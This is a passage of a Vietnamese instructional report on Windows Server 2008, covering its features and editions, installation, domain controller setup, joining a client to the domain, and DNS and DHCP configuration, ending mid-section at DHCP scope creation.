chống virus đƣợc cài đặt trên hệ thống của bạn là một điều cần thiết. Trong một văn

phòng của 10 ngƣời hoặc ít hơn, hệ thống có thể đƣợc duy trì riêng. Bất cứ điều gì nhiều


15


hơn thế, tuy nhiên, có thể trở thành một gánh nặng thực sự. Trong những trƣờng hợp này,

một gói phần mềm chống virus kết hợp máy trạm và bảo vệ chống virus máy chủ vào một

giải pháp duy nhất có ý nghĩa hơn.

- Sao lƣu tập trung: Tất cả các doanh nghiệp nên sao lƣu dữ liệu của họ một cách thƣờng

xuyên. Bởi có tất cả các công ty của bạn và dữ liệu nhân viên đƣợc lƣu trữ tại một địa

điểm, bản sao lƣu có thể đƣợc thực hiện đáng tin cậy và nhanh chóng. Vì vậy, bạn sẽ

không bao giờ cần phải lo lắng về những dữ liệu đƣợc lƣu trữ trên những gì máy trạm

nhƣ bạn làm trong một mạng peer-to-peer. Ngày nay, hầu hết các loại phƣơng tiện truyền

thông có thể đƣợc sử dụng cho mục đích sao lƣu. Ngoài các ổ đĩa truyền thống băng, đĩa

CD, DVD, lƣu trữ và thậm chí loại bỏ Network Attached Storage (NAS) thiết bị này là

chấp nhận đƣợc. Sự lựa chọn của bạn của phƣơng tiện truyền thông sẽ phụ thuộc vào yêu

cầu cụ thể của bạn sao lƣu. Tùy thuộc vào ngân sách của bạn và nhu cầu lƣu giữ dữ liệu

của bạn, bất kỳ trong số này sẽ là một giải pháp chấp nhận đƣợc. Hãy chắc chắn rằng bạn

có ít nhất một bản sao lƣu hàng tuần theo lịch trình, mặc dù hàng ngày sẽ tốt hơn.

CHƢƠNG 3:TỔNG QUAN VỀ WINDOWS SERVER 2008

I. GIỚI THIỆU WINDOWS SERVER 2008

Microsoft Windows Server 2008 là thế hệ kế tiếp của hệ điều hành Windows

Server, có thể giúp các chuyên gia công nghệ thông tin có thể kiểm soát tối đa cơ

sở hạ tầng của họ và cung cấp khả năng quản lý và hiệu lực chƣa từng có, là sản

phẩm hơn hẳn trong việc đảm bảo độ an toàn, khả năng tin cậy và môi trƣờng máy

chủ vững chắc hơn các phiên bản trƣớc đây.

Windows Server 2008 cung cấp những giá trị mới cho các tổ chức bằng việc

bảo đảm tất cả ngƣời dùng đều có thể có đƣợc những thành phần bổ sung từ các

dịch vụ từ mạng. Windows Server 2008 cũng cung cấp nhiều tính năng vƣợt trội

bên trong hệ điều hành và khả năng chuẩn đoán, cho phép các quản trị viên tăng

đƣợc thời gian hỗ trợ cho các doanh nghiệp.

Windows Server 2008 đƣợc thiết kế để cung cấp cho các tổ chức có đƣợc

nền tảng sản xuất tốt nhất cho ứng dụng, mạng và các dịch vụ web từ nhóm làm


16


việc đến những trung tâm dữ liệu với tính năng động, tính năng mới có giá trị và

những cải thiện mạnh mẽ cho hệ điều hành cơ bản.

Cải thiện hệ điều hành cho máy chủ Windows.Thêm vào tính năng mới,

Windows Server 2008 cung cấp nhiều cải thiệm tốt hơn cho hệ điều hành cơ bản so

với hệ điều hành Windows Server 2003.

Những cải thiện có thể thấy đƣợc gồm có các vấn đề về mạng, các tính năng

bảo mật nâng cao, truy cập ứng dụng từ xa, quản lý role máy chủ tập trung, các

công cụ kiểm tra độ tin cậy và hiệu suất, nhóm chuyển đổi dự phòng, sự triển khai

và hệ thống file.

II. CÁC TÍNH NĂNG CỦA WINDOWS SERVER 2008

1. Công cụ quản trị Server Manager

Server Manager là một giao diện điều khiển đƣợc thiết kế để tổ chức và quản

lý một server chạy hệ điều hành Windows Server 2008. Ngƣời quản trị có thể sử

dụng Server Manager với những nhiều mục đích khác nhau.

- Quản lý đồng nhất trên một server

- Hiển thị trạng thái hiện tại của server

- Nhận ra các vấn đề gặp phải đối với các role đã đƣợc cài đặt một cách dễ dàng

hơn

- Quản lý các role trên server, bao gồm việc thêm và xóa role

- Thêm và xóa bỏ các tính năng

- Chẩn đoán các dấu hiệu bất thƣờng

- Cấu hình server: có 4 công cụ (Task Scheduler, Windows Firewall, Services và

WMI Control).

- Cấu hình sao lƣu và lƣu trữ: các công cụ giúp bạn sao lƣu và quản lý ổ đĩa là

Windows Server Backup và Disk Management đều nằm trên Server Manager.


17


2. Windows Server Core

- Server Core là một tính năng mới trong Windows Server 2008. Nó cho phép có

thể cài đặt với mục đích hỗ trợ đặc biệt và cụ thể đối với một số role.

- Tất cả các tƣơng tác với Server Core đƣợc thông qua các dòng lệnh.

Server Core mang lại những lợi ích sau:

+Giảm thiểu đƣợc phần mềm, vì thế việc sử dụng dung lƣợng ổ đĩa cũng đƣợc

giảm. Chỉ tốn khoảng 1GB khi cài đặt.

+ Bởi vì giảm thiểu đƣợc phần mềm nên việc cập nhật cũng không nhiều.

+ Giảm thiểu tối đa những hành vi xâm nhập vào hệ thống thông qua các port đƣợc

mở mặc định.

+ Dễ dàng quản lý.

- Server Core không bao gồm tất cả các tính năng có sẵn trong những phiên bản cài

đặt Server khác. Ví dụ nhƣ .NET Framework hoặc Internet Explorer.

3. PowerShell

- PowerShell là một tập hợp lệnh. Nó kết nối những dòng lệnh shell với một ngôn

ngữ script và thêm vào đó hơn 130 công cụ dòng lệnh(đƣợc gọi là cmdlets).Hiện

tại, có thể sử dụng PowerShell trong:

+ Exchange Server

+ SQL Server

+ Terminal Services

+ Active Directory Domain Services.

+ Quản trị các dịch vụ, xử lý và registry.

- Mặc định, Windows PowerShell chƣa đƣợc cài đặt. Tuy nhiên bạn có thể cài đặt

nó một cách dễ dàng bằng cách sử dụng công cụ quản trị Server Manager và chọn

Features > Add Features


18


4. Windows Deloyment Services.

- Windows Deployment Services đƣợc tích hợp trong Windows Server 2008 cho

phép bạn cài đặt hệ điều hành từ xa cho các máy client mà không cần phải cài đặt

trực tiếp. WDS cho phép bạn cài đặt từ xa thông qua Image lấy từ DVD cài đặt.

Ngoài ra, WDS còn hỗ trợ tạo Image từ 1 máy tính đã cài đặt sẵn Windows và đầy

đủ các ứng dụng khác.

- Windows Deployment Serviece sử dụng định dạng Windows Image (WIM). Một

cải tiến đặc biệt với WIM so với RIS là WIM có thể làm việc tốt với nhiều nền

tảng phần cứng khác nhau.

5. Terminal Services.

- Terminal Services là một thành phần chính trên Windows Server 2009 cho phép

user có thể truy cập vào server để sử dụng những phần mềm.

- Terminal Services giúp ngƣời quản trị triển khai và bảo trì hệ thống phần mềm

trong doanh nghiệp một cách hiệu quả. Ngƣời quản trị có thể cài đặt các chƣơng

trình phần mềm lên Terminal Server mà không cần cài đặt trên hệ thống máy

client, vì thế việc cập nhật và bảo trì phần mềm trở nên dễ dàng hơn.

- Terminal Services cung cấp 2 sự khác biệt cho ngƣời quản trị và ngƣời dùng cuối

- Dành cho ngƣời quản trị: cho phép quản trị có thể kết nối từ xa hệ thống quản trị

bằng việc sử dụng Remote Desktop Connection hoặc Remote Desktop.

- Dành cho ngƣời dùng cuối: cho phép ngƣời dùng cuối có thể chạy các chƣơng

trình từ Terminal Services server.

6. Network Access Protection

- Network Access Protection (NAP) là một hệ thống chính sách thi hành (Health

Policy Enforcement) đƣợc xây dựng trong các hệ điều hành Windows Server 2008.

- Cơ chế thực thi của NAP:

+ Kiểm tra tình trạng an toàn của client.

+ Giới hạn truy cập đối với các máy client không an toàn.


19


+ NAP sẽ cập nhật những thành phần cần thiết cho các máy client không an toàn,

cho đến khi client đủ điều kiện an toàn.Cho phép client kết nối nếu client đã thỏa

điều kiện.

+ NAP giúp bảo vệ hệ thống mạng từ các client.

+ NAP cung cấp bộ thƣ viên API (Application Programming Interface), cho phép

các nhà

quản trị lập trình nhằm tăng tính bảo mật cho mình

7. Read-Only Domain Controllers

Read-Only Domain Controller (RODC) là một kiểu Domain Controller mới

trên Windows Server 2008.Với RODC, doanh nghiệp có thể dễ dàng triển khai các

Domain Controller ở những nơi mà sự bảo mật không đƣợc đảm bảo về bảo mật.

RODC là một phần dữ liệu của Active Directory Domain Services.

Vì RODC là một phần dữ liệu của ADDS nên nó lƣu trữ mọi đối tƣợng,

thuộc tính và các chính sách giống nhƣ domain controller, tuy nhiên mật khẩu thì

bị ngoại trừ.

8. Công nghệ Failover Clustering.

Clustering là công nghệ cho phép sử dụng hai hay nhiều server kết hợp với

nhau để tạo thành một cụm server để tăng cƣờng tính ổn định trong vận hành.Nếu

server này ngƣng hoạt động thì server khác trong cụm sẽ đảm nhận nhiệm vụ mà

server ngƣng hoạt động đó đang thực hiện nhằm mục đích hoạt động của hệ thống

vẫn bình thƣờng. Quá trình chuyên giao gọi là fail-over.

Những phiên bản sau hỗ trợ:

Windows Server 2008 Enterprise

Windows Server 2008 Datacenter

Windows Server 2008 Itanium


20


9. Windows Firewall with Advance Security

Windows Firewall with Advance Security cho phép ngƣời quản trị có thể

cấu hình đa dạng và nâng cao để tăng cƣờng tính bảo mật cho hệ thống.

Windows Firewall with Advance Security có những điểm mới:

Kiểm soát chặt chẽ các kết nối vào và ra trên hệ thống (inbound và

outbound)

IPsec đƣợc thay thế bằng khái niệm Connection Security Rule, giúp bạn có

thể kiểm soát và quản lý các chính sách, đồng thời giám sát trên firewall.

Kết hợp với Active Directory.

Hỗ trợ đầy đủ IPv6.

III. MỘT SỐ TÍNH NĂNG MỚI CỦA WINDOWS SERVER 2008

1. Công nghệ ảo hóa Hyper-V

Hyper-V là công nghệ ảo hóa server thế hệ mới của Microsoft, sự thay đổi

lớn nhất mà Microsoft mang lại so với phiên bản Windows Server 2003. Hyper-V

hoạt động trên nền hệ điều hành 64-bit. Với Hyper-V, ngƣời sử dụng có thể sở hữu

một nền tảng ảo hóa linh hoạt, bảo mật, tối đa hiệu suất và tiết kiệm chi phí:

Hyper-V có thể thích nghi với doanh nghiệp lớn với hàng nghìn máy tính

hoặc các doanh nghiệp nhỏ hay văn phòng chi nhánh. Hyper-V hỗ trợ bộ

nhớ ảo lên đến 64GB, đa bộ vi xử lý.

Khả năng bảo mật giống nhƣ các server vật lý. Kết hợp các cộng cụ bảo mật

Windows Firewall, Network Access Protection…do đó tính bảo mật tốt nhƣ

môi trƣờng thật.

Hyper-V giúp khai thác tối đa hiệu suất sử dụng phần cứng server. Bằng

việc hợp nhất server, cho phép một server vật lý có thể đóng nhiều vai trò

của nhiều server. Từ đó, tiết kiệm đƣợc chi phí từ các khoảng mua server,

điện, không gian và bảo trì.

Hyper-V chỉ có thể hỗ trợ đến 32 bộ vi xử lý.


21


2. Processor Compatibility Mode

Cho phép di trú các máy ảo sang một máy chủ vật lý khác với một phiên bản

CPU khác (nhƣng không phải là CPU của nhà sản xuất khác). Trƣớc đây, để

chuyển một máy ảo Hyper-V sang một phần cứng khác, các CPU phải giống nhau,

điều đó yêu cầu ngƣời dùng thƣờng phải mua lại phần cứng mới.

3. File Classification Infrastructure

FCI là một tính năng built-in cho phép các chuyên gia CNTT phân loại và

quản lý dữ liệu trong các máy chủ file. Dữ liệu có thể đƣợc phân loại với tác động

doanh nghiệp mức thấp, cao hoặc trung bình, sau đó ngƣời dùng có thể backup các

dữ liệu quan trọng nhất dễ dàng hơn và hiệu quả hơn.

4. Quản lý trong ỗ đĩa và file:

Cung cấp khả năng thay đổi kich thƣớc phân vùng.

Shadow Copy hỗ trợ ổ đĩa quang, ổ đĩa mạng.

Distributed File System đƣợc cải tiến.

Cải tiến Failover Clustering.

Internet Storage Naming Server cho phép đăng ký, hủy đăng ký tập trung và

truy xuất tới các ổ đĩa cứng iSCS.

5. Cải tiến giao thức và mã hóa

o Hỗ trợ mã hóa 128 và 256 bit cho giao thức chứng thực Keberos.

o Hàm API mã hóa mới hỗ trợ mã hóa vòng elip và cải tiến quản lý chứng chỉ.

o Giao thức VPN mới Secure Socket Tunneling Protocol.

o AuthIP đƣợc sử dụng trong mạng VPN Ipsec.

o Giao thức Server Message Block 2.0 cung cấp các cải tiến trong truyền

thông.

6. Một số tính năng khác

Windows Deployment Services thay thế cho Automated Deployment

Services và Remote Installation Services.


22


IIS 7 thay thế IIS 6, tăng cƣờng khả năng bảo mật, cải tiến công cụ chuẩn

đoán, hỗ trợ quản lý.

Có thành phần "Desktop Experience" cung cấp khả năng cải tiến giao diện.

IV. CÁC LỢI ÍCH CỦA WINDOWS SERVER 2008

Windows Server 2008 mang đến lợi ích trong bốn lĩnh vực:Web, Ảo hóa,

Bảo mật, Nền tảng vững chắc cho các hoạt động của tổ chức

1. Web

Windows Server 2008 cung cấp một nền tảng đồng nhất để triển khai dịch

vụ Web nhờ tích hợp IIS7.0,ASP.NET,Windows Communication Foundation và

Microsoft Windows SharePoint Services.

Lợi ich của IIS 7.0:

Tinh năng phân tích

Quản trị hiệu quả.

Nâng cao tính bảo mật.

Giảm chi phí hỗ trợ.

Giao diện thân thiện và tiện dụng

Hỗ trợ việc sao chép giữa các site.

Copy dễ dàng các thiết lập của trang web giữa các máy chủ web khác nhau

mà không cần phải thiết lập gì thêm.

Chính sách phân quyền quản trị các ứng dụng và các site rõ ràng

2. Ảo hóa :

Phiên bản 64 bit của Windows Server 2008 đƣợc tích hợp sẵn công nghệ ảo

hóa hypervisor :

Cho phép máy ảo tƣơng tác trực tiếp với phần cứng máy chủ hiệu quả hơn.

Có khả năng ảo hóa nhiều hệ điều hành khác nhau trên cùng 1 phần cứng

máy chủ sẽ làm giảm chi phí, tăng hiệu suất sử dụng phần cứng, tối ƣu hóa

hạ tầng, nâng cao tính sẵn sàng của máy chủ.


23


Tiết kiệm chi phí mua sắm bản quyền phần mềm.

Tich hợp và tập trung các ứng dụng phục vụ cho việc truy cập từ xa một

cách dễ dàng bằng cách sử dụng Terminal Services.

3. Bảo mật:

Các tính năng an ninh bao gồm: Network Access Protection, Read-Only

Domain Controller, BitLocker, Windows Firewall… cung cấp các mức bảo vệ

chƣa từng có cho hệ thống mạng, dữ liệu và công việc của tổ chức.

3.1. Network Access Protection (NAP):

NAP dùng để thiết lập chính sách mạng đối với các máy trạm khi máy trạm

đó muốn kết nối váo hệ thống mạng của tổ chức. Yêu cầu an ninh đối với

máy trạm đƣợc kết nối với hệ thống mạng:

Đã cài đặt phầm mềm diệt virus.

Đã cập nhật phiên bản mới.

Đã cài đặt các bản và lỗi hệ thống hoặc đã cài đặt phần mềm firewall.

3.2. Read-Only Domain Controller (RODC):

Là một kiểu Domain Controller (DC).

- RODC chứa một bản sao các dữ liệu "chỉ đọc" của dữ liệu Active Directory

(AD).

- User không thẻ ghi trực tiếp vào RODC.

- RODC không chứa thông tin về mật khẩu trong AD, mà chỉ caching các

users đƣợc phép sử dụng ở đó.

RODC thích hợp cho việc triển khai ở các chi nhánh, nơi có điều kiện bảo mật

kém cũng nhƣ trình độ của nhân viên IT còn hạn chế.

3.3. BitLocker:

o Bảo vệ an toàn cho máy chủ, máy trạm, máy tính di động.

o Mã hóa nội dung của ổ đĩa nhằm ngăn cản


24


o Nâng cao khả năng bảo vệ dữ liệu: kết hợp chức năng mã hóa tập tin hệ

thống và kiểm tra tinh toàn vẹn của các thành phần khi boot.

o Toàn bộ tập tin hệ thống đƣợc mã hóa, gồm cả file swap và file hibernation.

3.4. Windows Firewall:

Ngăn chặn các lƣu lƣợng mạng theo cấu hình và các ứng dụng dạng chạy để

bảo vệ mạng khỏi các chƣơng trình và ngƣời dùng nguy hiểm.

Hỗ trợ ngăn chặn các thông tin vào và ra.

Sử dụng MMC snap-in ( Windows Firewall with Adbanced Security) để đơn

giản hóa việc cấu hình, quản trị.

V. CÁC PHIÊN BẢN CỦA WINDOWS SERVER 2008

1. Windows Server 2008: ứng dụng cho các trung tâm data lớn, ứng dụng nghiệp

vụ riêng,... khả năng mở rộng cao cho tới 64 bộ xử lý.

2. Windows Server 2008 Standard Edition

Windows Server 2008 Standard là một trong những phiên bản ít tốn kém

nhất của các phiên bản khác nhau có sẵn. Windows Server 2008 Stardard hỗ trợ

tới 4GB RAM và 4 bộ vi xử lý.

Chủ yếu nhắm mục tiêu và các doanh nghiệp vừa và nhỏ. Chỉ có thể nâng

cấp lên Windows Server 2008 Standard từ Windows 2000 Server và Windows

Server 2003 Standard Edition.

3. Windows Server 2008 Enterprise Edition

Windows Server 2008 Enterprise Edition cung cấp chức năng lớn hơn và có

khả năng mở rộng hơn so với bản tiêu chuẩn. Cũng nhƣ phiên bản Standard

Edition thì phiên bản Enterprise cũng có cả hai phiên bản 32-bit và 64-bit. Hỗ trợ 8

bộ xử lý và lên tới 64GB bộ nhớ RAM trên hệ thống 32-bit và 2TB RAM trên hệ

thống 64-bit.

Các tính năng khác của ấn bản Doanh nghiệp bao gồm hỗ trợ Clustering đến

8 nút và Active Directory Federated Services (AD FS).


25


Các phiên bản Windows Server 2000, Windows 2000 Advanced Server,

Windows Server 2003 Standard Edition và Windows Server 2003 Enterprise

Edition đều có thể đƣợc nâng cấp lên Windows Server 2008 Enterprise Edition.

4. Windows Server 2008 Datacenter Edition

Phiên bản Datacenter đại diện cuối cùng của loạt sản phẩm máy chủ

Windows 2008 và mục tiêu là nhiệm vụ quan trọng đòi hỏi các doanh nghiệp ổn

định và mức độ thời gian hoạt động cao. Windows Server 2008 phiên bản

Datacenter là liên hệ chặt chẽ với các phần cứng cơ bản thông qua việc thực hiện

tùy chỉnh Hardware Abstraction Layer (HAL).

Windows server 2008 Datacenter cũng hỗ trợ hai phiên bản 32 bit và 64 bit.

Nó hỗ trợ 64GB bộ nhớ RAM trên nền 32 bit và lên tới 2TB RAM trên nền 64 bít.

Ngoài ra phiên bản này còn hỗ trợ tối thiểu là 8 bộ vi xử lý và tối đa là 64.

Để nâng cấp lên phiên bản này thì phải là các phiên bản Datacenter 2000 và

2003.

5. Windows Web Server 2008

Windows Web Server 2008 là một phiên bản của Windows Server 2008

đƣợc thiết kế chủ yếu cho mục đích cung cấp các dịch vụ web. Nó bao gồm

Internet Information Services (IIS) 7,0 cùng với các dịch vụ liên quan nhƣ

Simple Mail Transfer Protocol (SMTP) và Telnet. Nó cũng có các phiên bản

32-bit và 64-bit, phiên bản và hỗ trợ lên đến 4 bộ vi xử lý. RAM đƣợc giới

hạn 4GB và 32GB trên 32-bit và 64-bit hệ thống tƣơng ứng.

Windows Web Server 2008 thiếu nhiều tính năng hiện diện trong các phiên

bản khác nhƣ phân nhóm,mã hóa ổ đĩa BitLocker, Multi I/O,Windows

Internet Naming Service (WINS),Removable Storage Management và SAN

Management.


26


CHƢƠNG 4: CÀI ĐẶT WINDOWS SERVER 2008

I. YÊU CẦU PHẦN CỨNG

Phần cứng Yêu cầu tối thiểu Đề nghị

Bộ vi xử lý 1 Ghz (x86), 1,4 Ghz

(x64)

2Ghz hoặc lớn hơn

RAM 512MB RAM 2GB

Dung lƣợng trống 15GB 40GB

Windows Server 2008 hỗ trợ cả 2 cấu trúc vi xử lý 32-bit và 64-bit. Tuy

nhiên, phiên bản mới nhất là Windows Server 2008 R2, Windows Midmarket

Server và Windows Small Business với những tính năng đa dịch vụ, các phiên bản

này chỉ hỗ trợ cấu trúc vi xử lý 64-bit.

RAM hỗ trợ tối đa cho hệ thống 32-bit là 4GB khi chạy phiên bản

Standard Edition và 64GB khi chạy phiên bản Enterprise và Datacenter. Nếu

chạy hệ thống 64-bit, bộ nhớ RAM có thể hỗ trợ lên dến 32GB và 2TB RAM cho

phiên bản Enterprise và Datacenter. Thêm vào đó, Windows Server 2008 hỗ trợ

hệ thống Itanium, tuy nhiên chip xử lí Intel Itanium 2 nhân là cần thiết.

II. CÁC CÁCH CÀI ĐẶT

Có 6 cách cài đặt Windows Server 2008

Tự cài đặt các nâng cấp

Cài đặt từ kịch bản

Sử dụng Sconfig

Visual Core Configurator 2008

Cài đặt bằng cách sử dụng Core Configurator 2.0

Cài đặt trực tiếp từ đĩa CD Windows Server 2008


27


III. NÂNG CẤP LÊN WINDOWS SERVER 2008

Những phiên bản trƣớc Nâng cấp lên Windows Server

2008

Microsoft Windows Server 2003 R2 Standard,

Enterprise hoặc DatacenterEdition

Hỗ trợ đầy đủ

Microsoft Windows Server 2003 Service Pack

1(SP1) Standard, Enterprise hoặc Datacenter

Edition


Microsoft Windows Server 2003 Service Pack

2 (SP2) Standard, Enterprise hoặc Datacenter

Edition


Windows NT 4.0 Không hỗ trợ

Windows 2000 Server Không hỗ trợ

Windows XP Không hỗ trợ

Windows Vista Không hỗ trợ

Windows 7 Không hỗ trợ

Để nâng cấp lên phiên bản Windows Server 2008, cần phải chạy các hệ điều

hành ở cấp độ server. Không thể nâng cấp các phiên bản Windows dành cho ngƣời

dùng nhƣ Windows XP hoặc Windows Vista lên Windows Server 2008. Để nâng

cấp lên Windows Server 2008, hệ thống của bạn phải chạy Windows Server

2003. Việc nâng cấp từ Windows NT 4.0 và Windows 2000 Server không đƣợc hỗ

trợ. Việc nâng cấp từ những phiên bản Windows Server 2003 lên phiên bản

Windows Server 2008 Server Core không đƣợc hỗ trợ. Việc nâng cấp chỉ thực hiện

đƣợc ở những phiên bản giống nhau. Khi nâng cấp lên phiên bản Windows Server

2008, mọi cấu hình thiết lập, file và các chƣơng trình đều đƣợc giữ lại

IV. CÀI ĐẶT WINDOWS SERVER 2008


28


Đặt đĩa CD vào ổ đĩa, khởi động lại máy tính và bắt đầu tiến hành quá trình cài đặt.

Language to instalk : ngôn ngữ bạn muốn hiển thị.

Time and currency format : định dạng thời gian và tiền tệ.

Keyboard or input method : định dạng bàn phím và phƣơng thức nhập chữ.Sau

khi lựa chọn, click Next để tiếp tục cài đặt


29


Click Install now để bắt đầu cài đặt.

Lựa chọn phiên bản Windows Server thích hợp, ở đây chúng ta chọn phiên

bản Windows Server Standard without Hyper-V. Click Next để tiếp tục.


30


Tại bảng MICROSOFT PRE-RELEASE SOFTWARE LICENSE

TERMS là những điều khoản sử dụng sản phẩm của Microsoft. Đánh dấu

chọn vào I accept the license terms để chấp nhận những điều khoản đó và

click Next để tiếp tục.


31


Chọn Custom (advaneced) để tiến hành cài đặt tùy chọn.

Tiếp theo là chọn ổ đĩa để cài dặt Windows. Tiếp tục click Next sau khi đã chọn ổ

đĩa cài đặt.


32


Đợi cho đến khi hoàn tất cài đặt Windows Server 2008

Sau khi hệ thống hoàn tất cái đặt sẽ tự động đăng nhập vời tài khoản

Administrator, tuy nhiên mật khẩu đang ở trạng thái trống (blank) vì thế cần phải

thiết lập mật khẩu ở lần đăng nhập đầu tiên.

Click OK để tiến hành thay đổi mật khẩu.Sau đó đăng nhập vào bằng mật khẩu vừa

thay đổi.

Đến đây quá trình cài đặt kết thúc.

CHƢƠNG 5: DỰNG DOMAIN CONTROLLER


33


Giống nhƣ Windows Server 2003 sẽ vẫn cần chạy dcpromo từ nhắc lệnh

Run, tuy nhiên cần phải cài đặt Active Directory Domain Controller role, đầu

tiên bạn cài đặt role, sau đó chạy dcpromo.Vào Server ManagerRolesAdd

Roles

Xuất hiện trang Before You Begin, nhấn Next để tiếp tục.


34


Chọn Active Directory Domain ServicesAdd Required Features để cài đặt

thêm các tính năng này với Active Directory Server Role.

Sau khi chọn Active Directory DC Server Role, bạn sẽ thấy các thông tin về Server

Role.

Kích Install để cài đặt các file yêu cầu nhằm chạy dcpromo


35


Cài đặt đƣợc thực hiện thành công. Kích Close.

Trong bài này, chúng ta sẽ sử dụng 2 máy.

PC1: Là máy sử dụng Windows Server 2008.


36


PC2: Là máy sử dụng Client sử dụng Windows 7.

Quá trình cài đặt sẽ trải qua 2 bƣớc chính:

Bƣớc 1: Chỉnh Preferred DNS

- Ở bƣớc này chúng ta sẽ chỉnh Preferred DNS về chính máy tính của chúng ta, ở

đây là ip 192.168.1.1.

Trong trƣờng hợp giả sử chúng ta quên làm bƣớc này, thì quá trình nâng cấp

vẫn diễn ra bình thƣờng, và Windows sẽ tự chỉnh Preferred DNS về địa chỉ

192.168.1.1 Nhƣng tốt nhất các bạn nên làm bƣớc chỉnh này

Bƣớc 2: Nâng cấp lên Domain Controller

- Bạn vào Start-> Chọn Run, gõ dcpromo và Enter, sau đó lần lƣợt làm theo các

bƣớc sau:


37


Tiếp nào.

Thao tác này sẽ khởi chạy Welcome to the Active Directory Domain Service

Installation Wizard. Kích Next.

Sau đó tiếp tục nhấn Next.

Trong trang Choose a Deployment Configuration Create a new domain in a

new forest..


38


Trong trang Name the Forest Root Domain, nhập vào tên của miền trong hộp

nhập liệu FQDN of the forest room domain.Nhấn Next để tiếp tục.


39


Nhấn Next để tiếp tục.

Trong trang Set Forest Functional Level, chọn Windows Server 2008. Nhấn Next

để tiếp tục.


40


Trong trang Additional Domain Controller Options, Chọn DNS server và kích

Next.

Một hộp thoại sẽ xuất hiện nói răng không thể tạo đại biểu cho máy chủ

DNS này vì không thể tìm thấy vùng xác thực hoặc nó không chạy Windows DNS

server. Lý do cho điều này là vì đây là DC đầu tiên trên mạng. Nhấn Next để tiếp

tục.


41


Để lại thƣ mục Database, Log Files và SYSVOL ,kích Next.


42


Trong Directory Service Restore Mode Administrator Password, nhập

một mật khẩu mạnh vào các hộp nhập liệu Password và Confirm password.

Xác nhận các thông tin trên trang Summary và kích Next.


43


Active Directory sẽ cài đặt. Đặt một dấu kiểm vào hộp chọn Reboot on

completion để máy tính sẽ tự động khởi động lại khi cài đặt DC đƣợc hoàn tất.


44


CHƢƠNG 6: JOIN DOMAIN Chỉnh ip của máy Windows 7 sao cho cùng địa chỉ của lớp mà ta đã chọn ở

máy Server. Gateway và DNS trỏ về địa chỉ ip của máy Server.

Vào Start click phải computer chọn properties. Chọn change settings.


45


Click vào mở hộp thoại change.


46


Nhập domain của máy server vào -> OK

Nhập Administrator và pass.

Click OK.


47


Ta vào lại thấy hộp thoại đã có domain.


48


CHƢƠNG 7: TRIỂN KHAI CÁC DỊCH VỤ MẠNG

I. DỊCH VỤ DNS

1. Giới thiệu về DNS

DNS (Domain Name System) Server là máy chủ đƣợc dùng để phân giải

domain thành địa chỉ IP và ngƣợc lại. Về cách thức hoạt động, DNS Server lƣu trữ

một cơ sở dữ liệu bao gồm các bản ghi DNS và dịch vụ lắng nghe các yêu cầu.Khi

máy client gửi yêu cầu phân giải đến, DNS Server tiến hành tra cứu trong cơ sở dữ

liệu và gửi kết quả tƣơng ứng về máy client.

2. Cài đặt DNS

Vào Server Manager Roles Add Roles.Tại bảng Select Server Roles, chọn

DNS Server

- Sau đó nhấn Next để tiếp tục

- Chọn Instal. Tại bảng Confirm Installation Selections xác nhận việc cài đặt.


49


- Chọn Close để hoàn tất cài đặt.

3. Cấu hình DNS

- Đối với DNS Server,thông thƣờng nên xây dựng đồng thời hai hệ thống là DNS

Server chính (Primary) và DNS Server dự phòng (Secondary) dùng chung một cơ


50


sở dữ liệu. Với phƣơng pháp này,sẽ hạn chế khả năng dịch vụ DNS bị ngƣng khi

có sự cố xảy ra trên hệ thống.

- Vào Start Administrative Tools DNS.

- Nhấp chuột phải vào Forward Lookup Zones và chọn New Zone.

- Tại bảng Welcome to the New Zone Wizard ,chọn Next


51


- Tại bảng Zone Type chọn Primary zone để cấu hình DNS Server chính.

- Chọn Next. Tại bảng Zone Name gõ tên domain vào.


52


- Chọn Next. Tại bảng Zone File, để mặc định. Chọn Next.

- Chọn

Next.

Tại bảng Completing the New Zone Wizard xem lại thông tin.

- Sau đó chọn Finish để hoàn tất.

- Nhấp chuột phải vào ReverseLookup Zones và chọn New Zone.


53



54


- Tại bảng Welcome to the New Zone Wizard chọn Next.

- Tại bảng Zone Type chọn Primary zone để cấu hình chức năng reverse cho DNS

Server chính.

- Chọn Next.Tại bảng Reverse Lookup Zone Name chọn kiểu IP cần phân giải. Ở

đây chọn IPv4.


55


- Chọn Next. Điền Network ID và chọn Next.

- Tại bảng Zone File để mặc định. Chọn Next.

- Tại bảng Dynamic Update chọn Allow both nonsecure dynamic updates.


56


- Chọn Next và xem lại thông tin thiết lập, và sau đó chọn Finish để kết thúc.

Bổ sung các bản ghi DNS vào DNS Server

- Vào Start Administrative Tools DNS. Nhấp chuột phải vào zone và chọn

New

- Gõ tên host vào mục Name, gõ địa chỉ IP vào mục IP address. Nếu muốn tạo ra

một bản ghi DNS phân giải ngƣợc tƣơng ứng thì đánh dấu chọn Create associated

pointer (PTR) record.


57


- Sau đó chọn Add Host.Xuất hiện thông báo thành công.

Kiểm tra


58


II. GIỚI THIỆU DỊCH VỤ DHCP

Dịch vụ DHCP cho phép chúng ta cấp động các thông số cấu hình mạng cho

các máy trạm.(client).

Cơ chế sử dụng các thông số mạng đƣợc cấp phát động có ƣu điểm hơn so

với cơ chế khai báo tĩnh các thông số mạng nhƣ:

Khắc phục đƣợc tình trạng đụng địa chỉ IP và giảm chi phí quản trị cho hệ

thống mạng.Giúp cho các nhà cung cấp dịch vụ (ISP) tiết kiệm đƣợc số

lƣợng địa chỉ IP thật (Public IP).Phù hợp cho các máy tính thƣờng xuyên di

chuyển qua lại giữa các mạng.Kết hợp với hệ thống mạng không dây

(Wireless) cung cấp các điểm Hotspot nhƣ: nhà ga, sân bay, trƣờng học…

1. Hoạt động của giao thức

Giao thức DHCP làm việc theo mô hình client/server.Khi máy client khởi

động, máy sẽ gửi broadcast gói tin DHCPDISCOVER, yêu cầu một server phục vụ

mình. Gói tin này cũng chứa địa chỉ MAC của máy client.Các máy Server trên

mạng khi nhận đƣợc gói tin yêu cầu đó, nếu còn khả năng cung cấp địa chỉ IP, đều

gửi lại cho máy Client gói tin DHCPOFFER, đề nghị cho thuê một địa chỉ IP trong

một khoản thời gian nhất định, kèm theo là một subnet mask và địa chỉ của Server.

2. Cài đặt trên windows server 2008


59


- Server Manger Roles Add Roles.

Next Roles DHCP Server Next.

Things to Note

.


60


Next.

- Parent Domain

“Preferred DNS Validate

Next.


61


- Next.

Tiếp tục bấm Next. Trong Bảng Configure DHCPv6 Stateless Mode ta

chọn Disable DHCPv6 stateless mode for this server và bấm Next


62


- Next.

. Bấm Install để cài đặt

- , và nhấn Close


63


3. Cấu hình DHCP

3.1. Tạo Scop

